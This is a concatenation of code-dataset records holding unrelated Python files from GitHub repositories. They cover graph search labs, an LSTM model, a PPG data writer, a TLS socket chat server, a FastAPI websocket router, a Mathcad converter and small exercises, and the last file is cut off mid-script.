self.graph[visited]:\n if not self.explored:\n print(len(self.path_for_climbing))\n if i not in self.explored:\n self.all_sol(self.explored.copy(), i)\n else:\n if len(self.explored) == self.vertices:\n if self.explored not in self.path_for_climbing and start in self.graph[self.explored[len(self.explored) - 1]]:\n self.explored.append(start)\n self.path_for_climbing.append(self.explored)\n\n def hill_climbing(self):\n start = \"D\"\n self.all_sol( self.explored,start)\n if not len(self.path_for_climbing):\n print(\"No Path.\")\n return\n cost = self.find_actual_path_value(self.path_for_climbing[0])\n self.optimal_path()\n \n def optimal_path(self):\n for i in range(1, len(self.path_for_climbing)):\n current_path = self.find_actual_path_value(self.path_for_climbing[i])\n if current_path < cost:\n cost = current_path\n continue\n else:\n break\n print(f\"Best Cost of Travelling is : {self.path_for_climbing[i-1]}\")\n print(\"The cost of this path is : \", cost)\n\ng = Graph(4)\ng.add_all_edges()\ng.add_values()\ng.hill_climbing()\n","repo_name":"ZuhaaRana/Artficial-Intelligence-Labs","sub_path":"Lab 05/HillClimbing.py","file_name":"HillClimbing.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74575390976","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 13 16:46:46 2023\n\n@author: naftabi\n\"\"\"\n\nimport torch.nn as nn\n\nclass RNN(nn.Module):\n def __init__(self, input_dims, outputdims, hidden_size, num_layers=1):\n super(RNN, self).__init__()\n self.lstm = nn.LSTM(input_size=input_dims, \n hidden_size=hidden_size,\n num_layers=num_layers,\n proj_size=int(hidden_size/2),\n batch_first=True)\n self.linear = nn.Linear(int(hidden_size/2), outputdims) \n \n def forward(self, x):\n x, _ = self.lstm(x)\n return self.linear(x)","repo_name":"navidaftabi/rnn_paper","sub_path":"models/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32494330509","text":"\"\"\"\nCLass to save PPG data to a CSV file.\n\"\"\"\nfrom datetime import datetime\nimport io\n\n## Heartrate analysis package\nimport heartpy as hp\nfrom heartpy.exceptions import BadSignalWarning\n\n\nclass PPG_Writer(object):\n \n def __init__(self, csvStr=None):\n # Setup CSV File\n now = datetime.now()\n \n if csvStr is None:\n self.filename = 'ppg_' + now.strftime(\"%Y-%m-%d_%I_%M_%S\")\n else:\n self.filename = csvStr + '_' + now.strftime(\"%Y-%m-%d_%I_%M_%S\")\n \n self.filename = self.filename + \".csv\"\n \n headers = (u'time' + ',' + u'ps_waveform' + ',' + u'ps_bpm' + ',' + u'cam_waveform' + ',' + u'cam_bpm')\n \n with io.open(self.filename, 'w', newline='') as f:\n f.write(headers)\n f.write(u'\\n')\n \n \n def save_to_csv(self, data):\n with io.open(self.filename, \"a\", newline=\"\") as f:\n \n row = str(data['time'][-1]) + \",\" + \\\n str(data['psData'][-1]) + \",\" + str(data['psBPMData'][-1]) + \",\" + \\\n str(data['camData'][-1]) + \",\" + str(data['camBPMData'][-1])\n \n f.write(row)\n f.write(\"\\n\")\n \n \n def get_samplerate(self):\n loaded_times = hp.get_data(self.filename, column_name='time')\n fs = hp.get_samplerate_datetime(loaded_times, '%S.%f')\n return fs\n \n def get_cam_data(self):\n camData = hp.get_data(self.filename, column_name='cam_waveform')\n return camData\n \n def get_time_data(self):\n timeData = hp.get_data(self.filename, column_name='time')\n return timeData\n \n def get_bpm_estimate(self, time_data, cam_data):\n \n fps = hp.get_samplerate_datetime(time_data, '%S.%f')\n \n cam_bpm = 0\n \n filtered_ppg_r = hp.filter_signal(cam_data, \n cutoff = [0.8, 1], \n filtertype = 'bandpass',\n sample_rate = fps, \n order = 4,\n return_top = False)\n try:\n working_data, measures = hp.process(cam_data, fps)\n except BadSignalWarning:\n print(\"Bad signal\")\n else:\n if (measures['bpm'] > 40 and measures['bpm'] < 180):\n cam_bpm = measures['bpm']\n \n \n return filtered_ppg_r, cam_bpm\n ","repo_name":"Josuelmet/PPG_2020","sub_path":"v4/ppg_v4_writer.py","file_name":"ppg_v4_writer.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27538226248","text":"import sys\r\nimport socket\r\nimport ssl\r\nimport threading\r\n \r\n\r\nclass MsgExchange:\r\n def __init__(self): \r\n self.cond = threading.Condition()\r\n self.server_msg_sock = \"\"\r\n self.server_obj_sock = \"\"\r\n\r\n self.global_data = \"\"\r\n self.global_pos = 0\r\n self.recv_hd_lst = []\r\n self.recv_obj_lst = []\r\n\r\n\r\n def NotifyAll(self):\r\n print(\" In NotifyAll()\")\r\n\r\n if self.cond.acquire():\r\n print(\" \", str(self.global_pos) , \" notifying ...\")\r\n self.cond.notifyAll()\r\n self.cond.release()\r\n\r\n\r\n def clientThreadIn(self, conn, pos, nick):\r\n print(\" thread IN, \", nick, pos, \" start\")\r\n while True: \r\n try: \r\n temp = conn.recv(1024)\r\n self.global_pos = pos\r\n self.global_data = temp.decode()\r\n print(\" Thread IN .... global_data=\", self.global_data)\r\n\r\n if self.global_data:\r\n self.recv_hd_lst = self.global_data.split('|||')\r\n if self.recv_hd_lst[6] == 'xxxcccxxx':\r\n print(\" Thread IN, read obj run ................\")\r\n\r\n self.recv_obj_lst = self.read_obj_run()\r\n print(\" Thread IN, read obj run ................ done\")\r\n self.NotifyAll()\r\n else:\r\n print(\" Thread IN, global_data is empty\")\r\n except:\r\n self.global_data = \"disconnected\"\r\n self.global_pos = pos\r\n\r\n print(\" thread IN disconnected, \", nick, pos, \" closed\")\r\n self.NotifyAll()\r\n sys.exit()\r\n\r\n\r\n def server_msg_socket_run(self): \r\n try:\r\n host = socket.gethostname()\r\n host_id = socket.gethostbyname(host)\r\n port = 29002\r\n address = (host_id, port)\r\n\r\n self.server_msg_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.server_msg_sock.bind(address)\r\n self.server_msg_sock.listen()\r\n print(\" In server_msg_socket_run(), connect to \", address, \" success\")\r\n except:\r\n print(\" In server_msg_socket_run(), connect to \", address, \" failed\")\r\n\r\n\r\n def server_obj_socket_run(self): \r\n try:\r\n host = socket.gethostname()\r\n host_id = socket.gethostbyname(host)\r\n port = 29003\r\n address = (host_id, port)\r\n\r\n self.server_obj_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.server_obj_sock.bind(address)\r\n self.server_obj_sock.listen()\r\n print(\" In server_obj_socket_run(), connect to \", address, \" success\")\r\n except:\r\n print(\" In server_obj_socket_run(), connect to \", address, \" failed\")\r\n\r\n\r\n def read_obj_run(self): \r\n print(\"\")\r\n print(\" In read_obj_run(), waitng for an obj client connection\")\r\n client_sock, client_addr = self.server_obj_sock.accept()\r\n print(\" In read_obj_run(), get an obj client connection\")\r\n client_file = client_sock.makefile('rb')\r\n recv_obj_lst = []\r\n data = 'empty'\r\n while data and data != '': \r\n data = client_file.read()\r\n recv_obj_lst.append(data)\r\n print(\" In read_obj_run(), read loop\")\r\n client_file.close()\r\n print(\" In read_obj_run(), read file close\")\r\n client_sock.close()\r\n print(\" In read_obj_run(), read socket close\")\r\n print(\"\")\r\n return recv_obj_lst\r\n\r\n\r\n def clientThreadOut(self, conn, pos, nick): \r\n print(\" thread OUT, \", nick, pos, \" start\")\r\n while True: \r\n if self.cond.acquire(): \r\n print(\" thread OUT, \", nick, pos, \" wait ......................\")\r\n print(\"\")\r\n self.cond.wait() # release lock, wait\r\n print(\" thread OUT, \", nick, pos, \" wake up\")\r\n\r\n if self.global_pos != pos: \r\n if self.global_data == \"disconnected\": \r\n continue\r\n\r\n send_msg = self.global_data.encode()\r\n try:\r\n print(\" thread OUT \", self.global_data, \" send to \", nick)\r\n conn.send(send_msg)\r\n print(\" ThreadOut ................. sent\")\r\n\r\n except:\r\n print(\" thread OUT sending failed, global_data=\", self.global_data)\r\n self.cond.release()\r\n sys.exit() # terminate \"OUT\" thread\r\n\r\n if self.recv_hd_lst: \r\n print(\" check if need to send objects, recv_hd_lst=\", self.recv_hd_lst)\r\n\r\n if self.recv_hd_lst[6] == 'xxxcccxxx': \r\n print(\" clientThreadOut(), to send objects\")\r\n self.send_obj_run()\r\n print(\" clientThreadOut(), objects .............. sent\")\r\n\r\n self.cond.release()\r\n\r\n elif self.global_data == \"disconnected\": \r\n print(\" thread IN already closed, now close thread OUT, global_data=\", self.global_data)\r\n #conn.shutdown(socket.SHUT_RDWR)\r\n #conn.close()\r\n #del conn\r\n print(\" thread OUT \", nick, pos, \" closed connection socket deleted\")\r\n self.cond.release()\r\n sys.exit() # terminate \"OUT\" thread\r\n\r\n def send_obj_run(self): \r\n print(\" In send_obj_run(), waiting for an obj client connection\")\r\n client_sock, addr = self.server_obj_sock.accept()\r\n client_file = client_sock.makefile('wb')\r\n\r\n for chunk in self.recv_obj_lst: \r\n print(\" In send_obj_run(), write loop\")\r\n client_file.write(chunk)\r\n\r\n client_file.flush()\r\n client_file.close()\r\n print(\" In send_obj_run(), write file close\")\r\n client_sock.close()\r\n print(\" In send_obj_run(), write socket close\")\r\n\r\n \r\ndef main(): \r\n exch = MsgExchange()\r\n exch.server_msg_socket_run() # server side, a socket is created and listening to client connection for message\r\n exch.server_obj_socket_run() # server side, a socket is created and listening to client connection for objects\r\n\r\n threads1 = []\r\n threads2 = []\r\n pos = 0\r\n\r\n while True:\r\n exch.global_pos = pos\r\n print(\"\")\r\n print(\"main(), ............ communication exchange server is running, wait for a msg connect to accept ............\")\r\n print(\"\")\r\n print(\"\")\r\n newsock, addr = exch.server_msg_sock.accept() # newsock: a socket from a client, addr: address on other end\r\n print(\"main(), a new client msg connect\")\r\n \r\n newssl = ssl.wrap_socket(newsock, server_side=True, certfile=\"cert.pem\", keyfile=\"cert.pem\", \r\n ssl_version=ssl.PROTOCOL_TLSv1)\r\n temp = newssl.read()\r\n exch.global_data = temp.decode()\r\n\r\n if temp.decode() != \"\": # 1st data from a client\r\n print(\"main(), global_data=\", exch.global_data)\r\n comm_partner, comm_me, fullname, fname, fsuffix, filetype, obj = exch.global_data.split('|||')\r\n print(\"main(), connected from \", comm_me)\r\n exch.NotifyAll() # wake up to be sent jobs\r\n\r\n try:\r\n newssl.send(temp) # send message back to where it came from\r\n threads1.append(threading.Thread(name=comm_me + \" threadIn\",target=exch.clientThreadIn, \r\n args=(newssl, pos, comm_me)))\r\n threads1[pos].start()\r\n threads2.append(threading.Thread(name=comm_me + \" threadOut\",target=exch.clientThreadOut,\r\n args=(newssl, pos, comm_me)))\r\n threads2[pos].start()\r\n except:\r\n print(\" threads for \", comm_me, \" cannot start\")\r\n pos += 1\r\n s.close()\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n main()\r\n \r\n","repo_name":"yuping3252/Socket_Comm_Server","sub_path":"server20.py","file_name":"server20.py","file_ext":"py","file_size_in_byte":8597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21116833100","text":"import pathlib\nimport fastapi\nfrom fastapi import APIRouter\n\nfrom app.api.routers import instrument, order, auth\nfrom app.core.config import AUTH_COOKIE_NAME\nfrom app.core.security import get_user_by_id\nfrom app.utils import ntpro_server\n\nfrom app.utils.logger import root_logger\n\nhtml = pathlib.Path(\"./app/index.html\").read_text()\nwebsocket_server = ntpro_server.NTProServer()\n\napi_router = APIRouter(prefix=\"/api\")\n\napi_router.include_router(order.router)\napi_router.include_router(auth.router)\napi_router.include_router(instrument.router)\n\n\n@api_router.get(\n \"/\",\n summary=\"Basic GET endpoint\",\n description=\"\"\"Returns 'hello world'-like html page\"\"\",\n tags=[\"Main\"]\n)\ndef get_index():\n return fastapi.responses.HTMLResponse(html)\n\n\n@api_router.websocket(\"/ws\")\nasync def connect_to_websocket(websocket: fastapi.WebSocket):\n root_logger.info(\"Client attempting to establish websocket connection\")\n\n cookie = websocket.cookies.get(AUTH_COOKIE_NAME)\n user = await get_user_by_id(cookie)\n\n if not user:\n root_logger.warn(\n \"Unauthorized user tried to connect to WebSocket\"\n )\n raise fastapi.WebSocketException(fastapi.status.HTTP_401_UNAUTHORIZED)\n\n websocket.state.user = user\n await websocket_server.connect(websocket)\n\n try:\n await websocket_server.serve(websocket)\n except fastapi.WebSocketDisconnect:\n websocket_server.disconnect(websocket)\n","repo_name":"wallodya/ntprog_tt","sub_path":"server/app/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"17058424646","text":"'''\r\nCreated on 2015. 2. 7.\r\n\r\n@author: Ingoo\r\n'''\r\n'''\r\nThe Bellman-Ford algorithm for single-source shortest paths in general graphs\r\n\r\nprocedure shortest-paths(G,l,s)\r\nInput : Directed graph G = (V,E);\r\n edge lengths {l : e in E} with no negative cycles;\r\n vertex s in V\r\nOutput : For all vertices u reachable from s, dist(u is set to the distance from s to u\r\n\r\nfor all u in V :\r\n dist(u) = infinite\r\n prev(u) = nil\r\n \r\ndist(s) = 0\r\nrepeat |v|-1 times :\r\n for all e in E :\r\n update(e)\r\n\r\n \r\nprocedure update((u,v) in E)\r\ndist(v) = min{ dist(v), dist(u) + l(u,v)}\r\n\r\n'''\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\n\r\nbf = nx.DiGraph()\r\n\r\ndef bellman_ford(G,s):\r\n for x in G.nodes() :\r\n G.node[x]['distance'] = float(\"inf\")\r\n G.node[x]['prev'] = None\r\n G.node[s]['distance'] = 0\r\n for x in range(G.number_of_nodes()-1) :\r\n for e in G.edges(data=True) :\r\n G.node[e[1]]['distance'] = min(G.node[e[1]]['distance'],G.node[e[0]]['distance']+e[2].get('weight'))\r\n for x in G.nodes(data=True) :\r\n print(x)\r\n \r\n\r\nG = nx.DiGraph()\r\nnodelist = ['s','a','b','c','d','e','f','g']\r\nedgelist = [('s','a',10),('s','g',8),('a','e',2),('b','c',1),\r\n ('c','d',3),('d','e',-1),('e','b',-2),('f','a',-4),\r\n ('f','e',-1),('g','f',1)]\r\nG.add_nodes_from(nodelist)\r\nG.add_weighted_edges_from(edgelist)\r\n\r\nbellman_ford(G,'s')\r\n ","repo_name":"dlsrnsi/Algorithm","sub_path":"Bellman-ford.py","file_name":"Bellman-ford.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18520746381","text":"import sys\r\nimport tkinter as tk\r\nfrom tkinter.filedialog import asksaveasfile, askopenfilename\r\nfrom helper_functions import *\r\nimport os\r\nimport time\r\n\r\n\r\ndef show_exception_and_exit(exc_type, exc_value, tb):\r\n \"\"\"Show error without closing commnad window\"\"\"\r\n import traceback\r\n traceback.print_exception(exc_type, exc_value, tb)\r\n input(\"Press key to exit.\")\r\n sys.exit(-1)\r\n\r\n\r\ndef ask_for_files_location():\r\n def close_window():\r\n tk.Tk().destroy()\r\n window.destroy()\r\n\r\n def ask_path(file_path, file_tuple):\r\n f_path = askopenfilename(filetypes=file_tuple)\r\n file_path.set(f_path)\r\n\r\n window = tk.Tk()\r\n window.title('Upload input files')\r\n window.geometry('1200x400')\r\n\r\n xml_math, xml_scia, case_math, max_bar = tk.StringVar(), tk.StringVar(), tk.StringVar(value='N+My'), tk.StringVar(value='10')\r\n\r\n file_paths = [xml_math, xml_scia, case_math, max_bar]\r\n\r\n lbl1 = tk.Label(window, text=\"Paste the directory to mathcad file\")\r\n lbl1.grid(column=0, row=1, sticky=\"W\", padx=20)\r\n txt1 = tk.Entry(window, width=120, textvariable=xml_math)\r\n txt1.grid(column=1, row=1)\r\n button1 = tk.Button(window, text=\"Find path\", command=lambda: ask_path(xml_math, [(\"mathcad compressed files\", '.xmcdz .xmcd')]))\r\n button1.grid(column=2, row=1, sticky=\"W\")\r\n ent1 = tk.OptionMenu(window, case_math, 'N+My', 'N+Mz', 'Vy+Mz', 'Vz+My', 'T')\r\n ent1.grid(row=1, column=4, sticky=\"W\")\r\n\r\n lbl2 = tk.Label(window, text=\"Max numer of bars in layers\")\r\n lbl2.grid(column=0, row=2, sticky=\"W\", padx=20)\r\n txt2 = tk.Entry(window, width=40, textvariable=max_bar)\r\n txt2.grid(column=1, row=2, sticky=\"W\")\r\n\r\n lbl3 = tk.Label(window, text=\"Paste the path to .xml file\")\r\n lbl3.grid(column=0, row=4, sticky=\"W\", padx=20)\r\n txt3 = tk.Entry(window, width=120, textvariable=xml_scia)\r\n txt3.grid(column=1, row=4)\r\n button3 = tk.Button(window, text=\"Find path\", command=lambda: ask_path(xml_scia, [(\"xml files\", '.xml')]))\r\n button3.grid(column=2, row=4, sticky=\"W\")\r\n\r\n button = tk.Button(window, text=\"Save and next\", command=close_window, height=1, width=15)\r\n button.grid(column=0, row=8, sticky=\"W\", padx=20)\r\n\r\n window.mainloop()\r\n return [f.get() for f in file_paths]\r\n\r\n\r\ndef ask_for_table_name(tables):\r\n def close_window():\r\n root.destroy()\r\n\r\n root = tk.Tk()\r\n root.title('Which results to use')\r\n root.geometry('800x300')\r\n\r\n # define variables\r\n table_var = tk.StringVar(root)\r\n\r\n tk.Label(root, text='Table name').grid(row=0, column=0)\r\n ent1 = tk.OptionMenu(root, table_var, *tables)\r\n ent1.grid(row=1, column=0, sticky='NEWS')\r\n\r\n closeButton = tk.Button(root, text='Close and Next', command=close_window)\r\n closeButton.grid(row=2, column=0, sticky='NEWS')\r\n\r\n root.mainloop()\r\n return table_var.get()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sys.excepthook = show_exception_and_exit\r\n\r\n xml_math, xml_scia, case, max_bars = ask_for_files_location()\r\n # print(xml_math, '\\n', xml_scia, '\\n', case)\r\n tables = get_xml_table_names(xml_scia)\r\n table_name = ask_for_table_name(tables)\r\n\r\n print('Analysing mathcad file...')\r\n all_define = get_define_from_mathcad(xml_math)\r\n df = my_xml_parse_to_df(xml_scia, table_name)\r\n df_in, cols = input_df(df, case)\r\n if case == 'N+M':\r\n df_in['n_1'] = 2\r\n df_in['n_2'] = 0\r\n\r\n vars = df_in.columns\r\n # print(vars)\r\n python_str = 'import math\\nimport numpy as np\\nfrom helper_functions import moj_max, moj_min\\nmm = 0.001\\nN = 1\\ncm = 10 *mm\\n' \\\r\n 'kN = 1000 * N\\nMPa = N/mm**2\\nm = 1000 * mm\\nπ = math.pi\\n'\r\n\r\n python_str += '\\ndef calc(df1):\\n\\tdf = df1.copy()\\n'\r\n\r\n for i, elem in enumerate(all_define):\r\n\r\n list_of_commands = []\r\n list_of_commands = make_list_of_lists(elem, list_of_commands)\r\n list_of_equations = make_equ(list_of_commands)\r\n\r\n if list_of_equations[0][0] == 'function':\r\n var = ''\r\n else:\r\n var = list_of_equations[0][0]\r\n\r\n if var in vars:\r\n # python_str += '\\t' + var + ' = ' + 'np.array({})'.format(df_in[var].to_list()) + '\\n'\r\n python_str += '\\t' + var + ' = ' + 'df[\"{}\"].to_numpy()'.format(var) + '\\n'\r\n print(var, len(df_in[var].to_list()))\r\n elif var in cols:\r\n python_str += '\\t' + to_python(list_of_equations) + '\\n'\r\n python_str += '\\t' + 'if isinstance({}, np.ndarray) and ({}.size == 1):\\n\\t\\t'.format(var, var) + 'df[\"{}\"] = {}[0]'.format(var, var) + '\\n\\telse: \\n\\t'\r\n python_str += '\\t' + 'df[\"{}\"] = {}'.format(var, var) + '\\n'\r\n else:\r\n python_str += '\\t' + to_python(list_of_equations) + '\\n'\r\n\r\n python_str += '\\treturn df' #+ ','.join(cols)\r\n print('Calculating all results...')\r\n\r\n cur_dir = os.getcwd()\r\n my_file1 = os.path.join(cur_dir, 'my_file.py')\r\n with open(my_file1, 'w', encoding='utf-8') as f:\r\n f.write(python_str)\r\n\r\n sys.path.insert(1, cur_dir)\r\n\r\n from my_file import calc\r\n df_out = calc(df_in)\r\n print(df_out)\r\n if 'Pu' in df_out.columns: # conversion to kN and kNm\r\n # First row with different number of bars\r\n for i in range(3, int(max_bars)+1):\r\n if (df_out['Result'] == 'ok').all():\r\n break\r\n df_out['n_1'] = np.where(df_out['Result'] == 'ok', df_out['n_1'], i)\r\n df_out = calc(df_out)\r\n\r\n # Second row with different number of bars\r\n for i in range(1, int(max_bars)+1):\r\n if (df_out['Result'] == 'ok').all():\r\n break\r\n df_out['n_2'] = np.where(df_out['Result'] == 'ok', df_out['n_2'], i)\r\n df_out = calc(df_out)\r\n\r\n print('conversion to kN and kNm')\r\n df_out['Pu'] = df_out['Pu']/10**3\r\n df_out['Mu'] = df_out['Mu']/10**3\r\n df_out['Md'] = df_out['Md'].astype(float)/10**3\r\n\r\n max_n1 = df_out['n_1'].max()\r\n max_n2 = df_out['n_2'].max()\r\n\r\n df_max = df_out.loc[(df_out['n_1'] == max_n1) & (df_out['n_2'] == max_n2)]\r\n df_max = df_max.sort_values(by=['Mu', 'Pu'], ascending=[False, False])\r\n\r\n df[['N', 'V_y', 'V_z', 'M_x', 'M_y', 'M_z']] = df[['N', 'V_y', 'V_z', 'M_x', 'M_y', 'M_z']].astype('float64') / 1000\r\n df_max = df_max.merge(df.loc[df_max.index], on=['Case', 'Name', 'dx']).drop_duplicates().reset_index()\r\n\r\n else:\r\n idx_max = []\r\n for col in cols:\r\n if not df_out[col].dtypes == 'object' and df_out[col].idxmax() not in idx_max:\r\n idx_max.append(df_out[col].idxmax())\r\n print(idx_max)\r\n df_max = df_out.loc[idx_max]\r\n df[['N', 'V_y', 'V_z', 'M_x', 'M_y', 'M_z']] = df[['N', 'V_y', 'V_z', 'M_x', 'M_y', 'M_z']].astype('float64') / 1000\r\n df_max = df_max.merge(df.loc[idx_max], on=['Case', 'Name', 'dx']).reset_index()\r\n\r\n fout = asksaveasfile(title='Save excel file', mode='w', defaultextension=\".xlsx\")\r\n excel_file = fout.name\r\n print('Saving excel file...')\r\n with pd.ExcelWriter(excel_file, engine='openpyxl') as writer:\r\n df_out.to_excel(writer, sheet_name='all_checks', index=False)\r\n df_max.to_excel(writer, sheet_name='max_columns', index=False)\r\n\r\n int_force_in_mathcad = [col for col in df_in.columns if col not in ['Case', 'Name', 'dx']]\r\n fout = asksaveasfile(title='Save mathcad file', mode='w', defaultextension=\".xmcd\")\r\n mathcad_file = fout.name\r\n print('Saving mathcad file...')\r\n\r\n fill_in_mathcad(xml_math, int_force_in_mathcad, df_max, mathcad_file)\r\n os.remove(my_file1)","repo_name":"kniazmajowiec/mathcad_to_py","sub_path":"simple_case.py","file_name":"simple_case.py","file_ext":"py","file_size_in_byte":7644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2061628829","text":"## @file WinRcPath.py\r\n# Plugin to find Windows SDK Resource Compiler rc.exe\r\n##\r\n# This plugin works in conjuncture with the tools_def to support rc.exe\r\n#\r\n# Copyright (c) Microsoft Corporation\r\n# SPDX-License-Identifier: BSD-2-Clause-Patent\r\n##\r\nimport logging\r\nfrom edk2toolext.environment.plugintypes.uefi_build_plugin import IUefiBuildPlugin\r\nimport edk2toollib.windows.locate_tools as locate_tools\r\nfrom edk2toolext.environment import shell_environment\r\nfrom edk2toolext.environment import version_aggregator\r\nfrom pathlib import Path\r\n\r\n# MU_CHANGE Entire File - Perf improvements\r\nclass WinRcPath(IUefiBuildPlugin):\r\n\r\n def do_pre_build(self, thebuilder):\r\n #get the locate tools module\r\n \r\n # Check if the rc.exe path is already cached and still exists\r\n cache_path = Path(thebuilder.ws, \"Conf\", \".rc_path\")\r\n if cache_path.exists():\r\n with open(cache_path, \"r\") as f:\r\n rc_path = Path(f.readline().strip()).absolute()\r\n if (rc_path / \"rc.exe\").exists():\r\n logging.debug(f\"Found rc.exe folder in cache: {rc_path}\")\r\n self._set_path(rc_path)\r\n return 0\r\n\r\n # If it does not exist, try to find it with FindToolInWinSdk\r\n path = locate_tools.FindToolInWinSdk(\"rc.exe\")\r\n if path is None:\r\n logging.critical(\"Failed to find rc.exe\")\r\n return 1\r\n\r\n path = Path(path).absolute().parent\r\n self._set_path(path)\r\n cache_path.unlink(missing_ok=True)\r\n with cache_path.open(\"w\") as f:\r\n f.write(str(path))\r\n return 0\r\n\r\n def _set_path(self, path: Path):\r\n shell_environment.GetEnvironment().set_shell_var(\"WINSDK_PATH_FOR_RC_EXE\", str(path))\r\n version_aggregator.GetVersionAggregator().ReportVersion(\"WINSDK_PATH_FOR_RC_EXE\", str(path), version_aggregator.VersionTypes.INFO)\r\n","repo_name":"microsoft/mu_basecore","sub_path":"BaseTools/Plugin/WindowsResourceCompiler/WinRcPath.py","file_name":"WinRcPath.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"79"} +{"seq_id":"73401228734","text":"'''\n编写一个数组求和函数void Add(int n, int* a1, int* a2, int* result); 其中n<100是数组长度,a1是第一个数组,a2是第二个数组,result是a1和a2的和。\n假设a1={2, 4, 5, 8}, a2={1, 0, 4, 6},则result={3, 4, 9, 14};\n  编写main函数测试该函数的正确性。依次输入n, a1, a2, 输出result。\n输入:\n4\n2 4 5 8\n1 0 4 6\n\n输出:\n  3 4 9 14\n'''\nn = int(input())\narr1 = [int(i) for i in input().split()]\narr2 = [int(i) for i in input().split()]\nres = []\n\n\ndef summatiion(n, a1, a2):\n for i in range(n):\n res.append(a1[i] + a2[i])\n\n return res\n\n\nans = summatiion(n, arr1, arr2)\nfor i in range(len(ans)):\n if i == len(ans) - 1:\n print(ans[i])\n else:\n print(ans[i], end=' ')","repo_name":"extravert/eduOnline","sub_path":"BBQ/python_base/lanbridge/array/summation.py","file_name":"summation.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42803572752","text":"from django import template\n\nregister = template.Library()\n\n\n@register.filter()\ndef convert_list_by_range(queryset, field_name):\n result = []\n last_date = None\n couple = []\n for obj in queryset:\n if last_date != getattr(obj, field_name).date():\n if len(couple) > 0:\n result.append({'date': last_date, 'items': couple})\n last_date = getattr(obj, field_name).date()\n couple = []\n couple.append(obj)\n if len(couple) > 0:\n result.append({'date': last_date, 'items': couple})\n return result\n","repo_name":"clairkkluhnkkk5720/IMBTNG-WEBAPP","sub_path":"src/apps/core/templatetags/list_converter.py","file_name":"list_converter.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"11966808693","text":"\"\"\"\nAdd this to a .js file in the assets folder in the app root directory\n\n\nwindow.dash_clientside = Object.assign({}, window.dash_clientside, {\n clientside: {\n copyToClipboard: function (n, text) {\n if (!navigator.clipboard) {\n alert(\"copy not available, use ctrl-c\");\n return;\n }\n if (n > 0) {\n // removes code block markdown syntax ```\n const trimmed_text = text.replace(/(^```)|(```$)/g, '');\n navigator.clipboard.writeText(trimmed_text).then(function() {\n alert(\"Copied. crl-v to paste\")\n }, function() {\n alert('copy error')\n });\n }\n }\n }\n});\n\"\"\"\n\n\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State, ClientsideFunction\n\nFONT_AWESOME = (\n \"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css\"\n)\nexternal_stylesheets = \"https://codepen.io/chriddyp/pen/bWLwgP.css\"\n\napp = dash.Dash(__name__, external_stylesheets=[FONT_AWESOME, external_stylesheets])\n\n\nsample_code = \"\"\"```\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.express as px\nimport pandas as pd\n\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\nfig = px.scatter(df, x=\"gdp per capita\", y=\"life expectancy\",\n dcc.Graph(\n id='life-exp-vs-gdp',\n figure=fig\n )\n])\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n\n```\"\"\"\n\n\napp.layout = html.Div(\n [\n html.Details(\n [\n html.Summary(\n [\n \"Code sample\",\n html.Button(\n id=\"copy_code\",\n n_clicks=0,\n className=\"fa fa-copy\",\n style={\"margin\": 10},\n ),\n ]\n ),\n dcc.Markdown(id=\"code\", children= sample_code),\n ],\n style={\"borderStyle\": \"solid\", \"borderWidth\": 1,},\n ),\n ]\n)\n\n\napp.clientside_callback(\n ClientsideFunction(namespace=\"clientside\", function_name=\"copyToClipboard\"),\n Output(\"copy_code\", \"children\"), # this function has no output, but Dash requires an Output\n Input(\"copy_code\", \"n_clicks\"), # when the copy button is clicked on:\n State(\"code\", \"children\"), # copies the children of this component to the clipboard\n)\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","repo_name":"AnnMarieW/dash-quickstart","sub_path":"demo_apps/copy_to_clipboard.py","file_name":"copy_to_clipboard.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"70415890174","text":"# Menentukan transpose matriks\r\n\r\n#Masukkan besar variabel pada kolom dan baris\r\nbaris = int(input(\"Masukkan jumlah baris matriks : \"))\r\nkolom = int(input(\"Masukkan jumlah kolom matriks : \"))\r\n\r\n#lakukan perulangan bertingkat dengan tujuan membentuk matriks awal\r\n\r\nM = [[0 for j in range (kolom)] for i in range (baris)]\r\nfor i in range (baris):\r\n for j in range (kolom):\r\n M [i][j] = int(input(\"Masukkan besar bilangan : \"))\r\n\r\n#mempersiapkan data data matriks sebelum di transpose dengan perulangan bertingkat\r\n\r\nprint (\"Matriks yang akan 